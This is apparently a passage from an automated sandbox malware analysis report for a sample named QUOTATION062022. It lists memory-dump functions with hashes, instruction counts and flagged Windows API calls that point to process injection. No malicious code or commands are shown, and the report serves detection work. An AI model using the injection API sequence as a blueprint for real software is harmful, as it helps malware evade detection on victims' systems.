API String ID: 0-985283518
Opcode ID: bf6611154bce90eec9844b832780d7fb87b72977bc0f922c01ce9b7d7b88f422
Instruction ID: d128661450c674f0d6c20698a955a2b5147c6641a9b464438eb71e8c36783968
Opcode Fuzzy Hash: bf6611154bce90eec9844b832780d7fb87b72977bc0f922c01ce9b7d7b88f422
Instruction Fuzzy Hash: 2F53AC70D152688FCB54EF38DD856ADBBB2FB84204F0084EAD488A3359DB786E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E7AF50 Relevance: 3.7, Instructions: 3660
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b801cec36eb3c6aa9e7513d4357ad88a727f76ef7e6fd4913bec8106ef7d54
Instruction ID: 930eb10e3200c7d5e1411248048c98fc163895f339d280a2d8387f0af254b7a0
Opcode Fuzzy Hash: 92b801cec36eb3c6aa9e7513d4357ad88a727f76ef7e6fd4913bec8106ef7d54
Instruction Fuzzy Hash: 50637E70E04618CBDB54EF79D8957AEB7B6FB88304F0085A9D448A3348DB39ADA4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04E7AF60 Relevance: 3.7, Instructions: 3659
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955ea71eeed39791031a714da223450d9832d56806c7b518456ee8a1af009042
Instruction ID: 00b8975b726cd8c0311f5ce2b3215a3008144250de9789e6348c6889792767bd
Opcode Fuzzy Hash: 955ea71eeed39791031a714da223450d9832d56806c7b518456ee8a1af009042
Instruction Fuzzy Hash: 25637D70E04618CBDB54EF79D8957AEB7B6FB88304F0085A9D448A3348DB39ADA4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0280A28F Relevance: 3.0, Instructions: 3030
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8161eee0b9fe59a855c04aab60226bbce76e1ff86bce87b1a320f00fbef1aa91
Instruction ID: 8e9010bcfc1d71155159683afa488ee1894cfd27f804437391db0c324f13f283
Opcode Fuzzy Hash: 8161eee0b9fe59a855c04aab60226bbce76e1ff86bce87b1a320f00fbef1aa91
Instruction Fuzzy Hash: AB536D74E15268CFDB54EF38DD85A9CBBB2FB88200F0049E9D448A7298DB346E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02802CB5 Relevance: 1.9, Instructions: 1905
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0ce4731ed9d254498b88eb2091c1669797fe6ff576059cca24ef391880f071
Instruction ID: c8a2a8f431988578897385870769ba4b7897d98015ffc16d8b4130dd7e3c3e21
Opcode Fuzzy Hash: 8c0ce4731ed9d254498b88eb2091c1669797fe6ff576059cca24ef391880f071
Instruction Fuzzy Hash: D7038E74E145688FCB54EF38DD8569DBBB2FB84300F0049E9D488A3299DB386EA5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04EB8E79 Relevance: 1.8, Instructions: 1804COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294780768.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fbfa6e0767f7cc71c18aa2ed81ac10b049f04da7e3a536c8ea77e844cfb2313
Instruction ID: 9fd2660f1223ede8add22cd0472cb984e6bb73a2c444cafc5801a517e8f46d9a
Opcode Fuzzy Hash: 5fbfa6e0767f7cc71c18aa2ed81ac10b049f04da7e3a536c8ea77e844cfb2313
Instruction Fuzzy Hash: C9034E70E141288FCB54EF39DD8669DBBB2FB88205F0045E9D48CA3258DB786E95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0280F458 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0280F6E8

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: d21f6f5bf15b38fe599d9a43567a7628d39910ddc2dede821b47b7ba8e49c25e
Instruction ID: cffba98cdcefe072bebb98a08f89cf0786653e3211fd0fc607078aa5ef4ca8e1
Opcode Fuzzy Hash: d21f6f5bf15b38fe599d9a43567a7628d39910ddc2dede821b47b7ba8e49c25e
Instruction Fuzzy Hash: 8BA13779E002198FDB60CFA8CD817DDBBB2BF58308F048169E918E7691DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04EB7E64 Relevance: 1.7, Instructions: 1716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294780768.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26470793913c59ef271e564bc52a04c3dd55e5d3d7d888522eb820843f7350d
Instruction ID: 0d6b41474372d59db08bbbb012f3458fdc5ea7eae0da9c82bdd209af36897ae1
Opcode Fuzzy Hash: a26470793913c59ef271e564bc52a04c3dd55e5d3d7d888522eb820843f7350d
Instruction Fuzzy Hash: 1CF23B70E141288FCB54EF39DD8669DBBB2FB88205F0045E9D48CA3258DB786E95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04E7560C Relevance: 1.5, Instructions: 1534COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e5299421ad7f4ceaa5815c8f30bf24f0aaaaafecba32bf30418d1dfe4bb0ac
Instruction ID: 7e65ffcd2eb107872a70e1c86d6fb2e26f6f26f181133588e0fa4a688f4cd9f6
Opcode Fuzzy Hash: 91e5299421ad7f4ceaa5815c8f30bf24f0aaaaafecba32bf30418d1dfe4bb0ac
Instruction Fuzzy Hash: B1E22A70E142688FDB54EF39D98A69CBBB1FB88311F0085E9D44CA7258DB386E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E7001F Relevance: 1.5, Instructions: 1468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c893375c69ba21cf971451794870b0ba076646cba166def931a75579fdeb9d4
Instruction ID: a889fef35b2a253cb80461390d56bbad6c88f0ed66af46e0a04e5054ab4a07d8
Opcode Fuzzy Hash: 7c893375c69ba21cf971451794870b0ba076646cba166def931a75579fdeb9d4
Instruction Fuzzy Hash: A9E24970E14228CFDB54EF39D98569DBBB2FB88300F4049E9D488A7258DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E856B9 Relevance: 1.4, Instructions: 1447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294719481.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7366c6a3d1ccf1024e3e16a0aa61050a198d83479f23b97aa688513d60e281fe
Instruction ID: c0c486b989752ae0778e3bbc7d315d42b42734e7e7fae9fffb85d4852342155d
Opcode Fuzzy Hash: 7366c6a3d1ccf1024e3e16a0aa61050a198d83479f23b97aa688513d60e281fe
Instruction Fuzzy Hash: F8E20970A152288FDB64EF39D985A9CBBB1FB88700F0045EED44CA7258DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02890398 Relevance: 2.5, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xok, xrefs: 028903BA
xok, xrefs: 028903C4

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID: xok$xok
API String ID: 0-2855744444
Opcode ID: 48b729e555d3e0e96326e0412211fcbce7721a40dd8a6edc9fa999a910555940
Instruction ID: 50d2728c99597958a392c78a039fb21f72b5359c30302c0b7a903ca7eab0f030
Opcode Fuzzy Hash: 48b729e555d3e0e96326e0412211fcbce7721a40dd8a6edc9fa999a910555940
Instruction Fuzzy Hash: 7CF0B47DB0D6619BEB26572C942032A2B935F9645CF2D41BAC446CB346CA354C43D7A3

Uniqueness

Uniqueness Score: -1.00%

Function 02890250 Relevance: 2.5, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xok, xrefs: 0289027C
xok, xrefs: 02890272

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID: xok$xok
API String ID: 0-2855744444
Opcode ID: 3e2038ae455c099ff4725c69b93d7fcb8e3eb30d85db975a496ca0d0d6ceec99
Instruction ID: 1e01e3f9e7f0cafa073f3780a89f2b4a703bd6c3cab8c901d819b827dcac6698
Opcode Fuzzy Hash: 3e2038ae455c099ff4725c69b93d7fcb8e3eb30d85db975a496ca0d0d6ceec99
Instruction Fuzzy Hash: 1AF02E7EB0C2214FEB6716AC64206362B934FC755CB2E82BA8444DB243CA25484383A2

Uniqueness

Uniqueness Score: -1.00%

Function 0280F44D Relevance: 1.8, APIs: 1, Instructions: 266processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0280F6E8

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 54f9f0aee672cfa8cd40f6cbbc96e2963573eb2f507fb1c245e7734da94a6eaa
Instruction ID: fda998f1b01a2ff0d9fc56df3138bf9ecfd5076af2daee5dd8d6f78f85462768
Opcode Fuzzy Hash: 54f9f0aee672cfa8cd40f6cbbc96e2963573eb2f507fb1c245e7734da94a6eaa
Instruction Fuzzy Hash: DCA14979E002198FDB60CFA8CC817DDBBB2EF49308F048169E918E7691DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0280FA49 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0280FADD

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0b39b0b7f9323121e0d581c1ae72a1e212471ca1f844b2fe8106e673c44a0737
Instruction ID: 2251d45981296c98dab926144caaf14c992a3ac212506dfe994b16e422f812e4
Opcode Fuzzy Hash: 0b39b0b7f9323121e0d581c1ae72a1e212471ca1f844b2fe8106e673c44a0737
Instruction Fuzzy Hash: C72123B5900249DFCB10CF9AC885BDEBBF4FB48314F10842AE919E7350D774A954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280FA50 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0280FADD

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0ca1afbd86bc0a5256ac25f8cd82cac1e23d2977a1fa57c9b7552b1658f4fb04
Instruction ID: 82f3629bc455354d886e7847ba11e459db753f1da24d8c2f4789daffa5d02236
Opcode Fuzzy Hash: 0ca1afbd86bc0a5256ac25f8cd82cac1e23d2977a1fa57c9b7552b1658f4fb04
Instruction Fuzzy Hash: 5B21E3B59002599FCB10CF9AC885BDEBBF4FB48314F10842AE919A7750D774A954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F820 Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0280F89F

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 1da33b83dfbfd429a8d01e699f8e5d13170f44204c3c640c6354bd1f5a4444da
Instruction ID: 68f764ed8616873b89014eff02186a84648dd151577de5dbe7b5988be8a07197
Opcode Fuzzy Hash: 1da33b83dfbfd429a8d01e699f8e5d13170f44204c3c640c6354bd1f5a4444da
Instruction Fuzzy Hash: B82115B5D0061A9BDB10CF9AC8857EEFBB8BB49224F14812AE518E3640D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F8E1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0280F95E

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e4ac6232b31816ceb4d6671189dae24b0e7a9293aac903f6b9553de38c631cc3
Instruction ID: 0a2d6ee4aed8f5c63c9f1345e4ccd64946d57b0905c5c66e29d686102eada7b8
Opcode Fuzzy Hash: e4ac6232b31816ceb4d6671189dae24b0e7a9293aac903f6b9553de38c631cc3
Instruction Fuzzy Hash: DC212476900249DFDB10CF9AC884BEEFBF8FB48324F14802AE558A3650D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F828 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0280F89F

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 2063ecc2f78c4f706cebecdaf7f72c29bc0ac7fa39588d0c71973d642007709f
Instruction ID: 845f05834690142c7915ccc91d0e94ecfecc46458f79716a1b614f2c700166de
Opcode Fuzzy Hash: 2063ecc2f78c4f706cebecdaf7f72c29bc0ac7fa39588d0c71973d642007709f
Instruction Fuzzy Hash: F52106B5D0065A9FDB10CF9AC8857DEFBF4BB48224F14812AE918A3740D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F8E8 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0280F95E

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: def76e22774d16c8bc03bb67ae1602db508f7b935174c38b78c4d04ef26220ff
Instruction ID: 7ad011688c2f512a1e46c43606f0c45b6c01cab666bfbf8366f2448102f802e9
Opcode Fuzzy Hash: def76e22774d16c8bc03bb67ae1602db508f7b935174c38b78c4d04ef26220ff
Instruction Fuzzy Hash: 7221F475900249DFCB10CF9AC884BDEFBF4EB48324F148429E558A3650D774A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F9A1 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0280FA13

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1706af6a6161ae17272c8d4c9d6b5456c888108e838c139bea6ae39fba1631b7
Instruction ID: f4f5234c2f054a11bedd85858da2da06600562e6c1d65637ff4bf382149d679f
Opcode Fuzzy Hash: 1706af6a6161ae17272c8d4c9d6b5456c888108e838c139bea6ae39fba1631b7
Instruction Fuzzy Hash: 781146B5900249DFDB20CF9AC884BDFBBF4FB48324F208419E619A7210C775A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0280FB20 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0280FB87

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 790dd4b178b25f7fdaf9d59a5cd99c2514c145c2e77483412c0225d88d3d56c7
Instruction ID: 93050a2bab3f12f5a3972c1d7f842783ca768e04a035025298a904868abe608d
Opcode Fuzzy Hash: 790dd4b178b25f7fdaf9d59a5cd99c2514c145c2e77483412c0225d88d3d56c7
Instruction Fuzzy Hash: 791136B5800649CFDB20DF9AC884BDEFBF8EB49224F10845AD519A7750C774A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280F9A8 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0280FA13

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 04c6b935998cf5ec17c358ebf668147f23194c534df14c0c06b7e74210f04b7a
Instruction ID: 0f3433faf28bf9fdcd001e35b1d80ccac3f868339ce31536d7e3fc904a2af67c
Opcode Fuzzy Hash: 04c6b935998cf5ec17c358ebf668147f23194c534df14c0c06b7e74210f04b7a
Instruction Fuzzy Hash: A51113B5900249DFCB20CF9AC884BDEBBF4FB88324F148419E518A7650C775A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0280FB28 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0280FB87

Memory Dump Source

Source File: 00000000.00000002.292202191.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2800000_QUOTATION062022.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9567c2354f4e882d2fa377c47523b0f486d4a3c02bec53565a36081a5e0b5ca0
Instruction ID: 4868cb6267c5a50da87ba16b5c027f80266e2dbdc8f211dd9d5ff3ca6cbdb477
Opcode Fuzzy Hash: 9567c2354f4e882d2fa377c47523b0f486d4a3c02bec53565a36081a5e0b5ca0
Instruction Fuzzy Hash: 581112B5800249CFCB20DF9AD884BDEFBF8EB88324F20845AD519A3740C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E9001F Relevance: 1.5, Instructions: 1459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294739377.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c659e52fcaecc75b0c00d91073f9d8ae2c8009146e51b5e0a4aceeed87e5ec5
Instruction ID: c97b13df822842ef5d2f5986ce0a214a6a771a965e899684891d7c5e16c6f4ab
Opcode Fuzzy Hash: 1c659e52fcaecc75b0c00d91073f9d8ae2c8009146e51b5e0a4aceeed87e5ec5
Instruction Fuzzy Hash: 43E20970918128CFDB54EF39D98669CBBB2FB88304F0145EAD44CA7298DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E7EB67 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81560a873dc8de0a417f478c1501d6c04242b2b868d13ad696e27742d020fdae
Instruction ID: 3091eeefc6d21b8e8f5641736733c0a65176d4beb72a0bc829aed3d9a6f2ce6b
Opcode Fuzzy Hash: 81560a873dc8de0a417f478c1501d6c04242b2b868d13ad696e27742d020fdae
Instruction Fuzzy Hash: BD425DB0A04618CFDB54EF39D89576EB7B2FB88204F0085E9D44893249DB39AEA5CF15

Uniqueness

Uniqueness Score: -1.00%

Function 04E8C2F0 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294719481.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7308eba90bbf1eabce2693423a3a0c77c90ae4dedd404ae35656c5d68eb758e
Instruction ID: 742ce9a14151c59589af30e408ec7f8fb8e2e0b371c927f415ca518ecd7e79d3
Opcode Fuzzy Hash: d7308eba90bbf1eabce2693423a3a0c77c90ae4dedd404ae35656c5d68eb758e
Instruction Fuzzy Hash: 33026F70A14104CBCB44FFB9E89666EBBF6EB88304F148869D489D7358DF39AC15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04E8C300 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.294719481.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c30f0e27808bab363e5cca8f6aade65389593855b2eb391628aceb338549ed7
Instruction ID: 37df5125842b752a19dfcfeea41e4d953bc51481247f8fada201d587e15b278a
Opcode Fuzzy Hash: 5c30f0e27808bab363e5cca8f6aade65389593855b2eb391628aceb338549ed7
Instruction Fuzzy Hash: 94026070A14104CBCB44FFB9E89666EBBF6EB88304F148869D489D7358DF39AC15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02890E18 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcaff8bac25bd3281a33e82f9842cc97683d2a61faf9911d27f083a33278f8e2
Instruction ID: 9b9e66e4cc8e37ca8b472e9fc8291f51fc7544aa15195dde428cf5627782b97d
Opcode Fuzzy Hash: bcaff8bac25bd3281a33e82f9842cc97683d2a61faf9911d27f083a33278f8e2
Instruction Fuzzy Hash: 2E21F679B1820A9FDF249F949850B6F775FAF88694F198025F909DB341CB31AC11C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02890DFF Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918851e6ca0cc15b1e39f51a5a1e3b4a91f4b9315466952c936e240d65b565f7
Instruction ID: c44046da99dbe43a9b0c19464004495f6f5a65352ca3954e6414ab7952ba4cd3
Opcode Fuzzy Hash: 918851e6ca0cc15b1e39f51a5a1e3b4a91f4b9315466952c936e240d65b565f7
Instruction Fuzzy Hash: 7821217DA18389EFEF228E449840BAF7B3EAF85754F094066F848CA152C7315C51C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02890A9C Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89bb9cbf56b6bed5d95185f1eb6af577df860a4e12ab2daf5ce8e46dec6a75bf
Instruction ID: d0f333e0d379961c3a2639b08caaa355bc52c55453534dfe4d4a9c40d917d20f
Opcode Fuzzy Hash: 89bb9cbf56b6bed5d95185f1eb6af577df860a4e12ab2daf5ce8e46dec6a75bf
Instruction Fuzzy Hash: ED01D639B092944B8B165B3D0824127BBE79FCB16832E80BBD149DB35BCB214C41C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 028900B4 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4b2e55331faf867bd637711cdd6191abb39e27f805efed1260db5b4573a7715
Instruction ID: 6a0cacc862fe2336c0663268a0f1bd646fc9594a03826a8cefd432aac4ead290
Opcode Fuzzy Hash: f4b2e55331faf867bd637711cdd6191abb39e27f805efed1260db5b4573a7715
Instruction Fuzzy Hash: FD01F4387083458FDB224A1C8820B23BBB6AF82714F2D80A7E984CF252CA308C01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 028900C8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2890000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7eeaf204542f032038962fbafe7fe6465ae01a6ab16da8000b32e215ecab6b
Instruction ID: d2d39999609c7cf68ccfcd9530d61591d22a6d0bbb93efbc77b8d9a02114fab2
Opcode Fuzzy Hash: bf7eeaf204542f032038962fbafe7fe6465ae01a6ab16da8000b32e215ecab6b
Instruction Fuzzy Hash: CAF0CD39B402148FCB245A0D9420B2B62DB9BC5A95F29803ABA06DB344CE719C0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 02890B88 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.293049866.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false

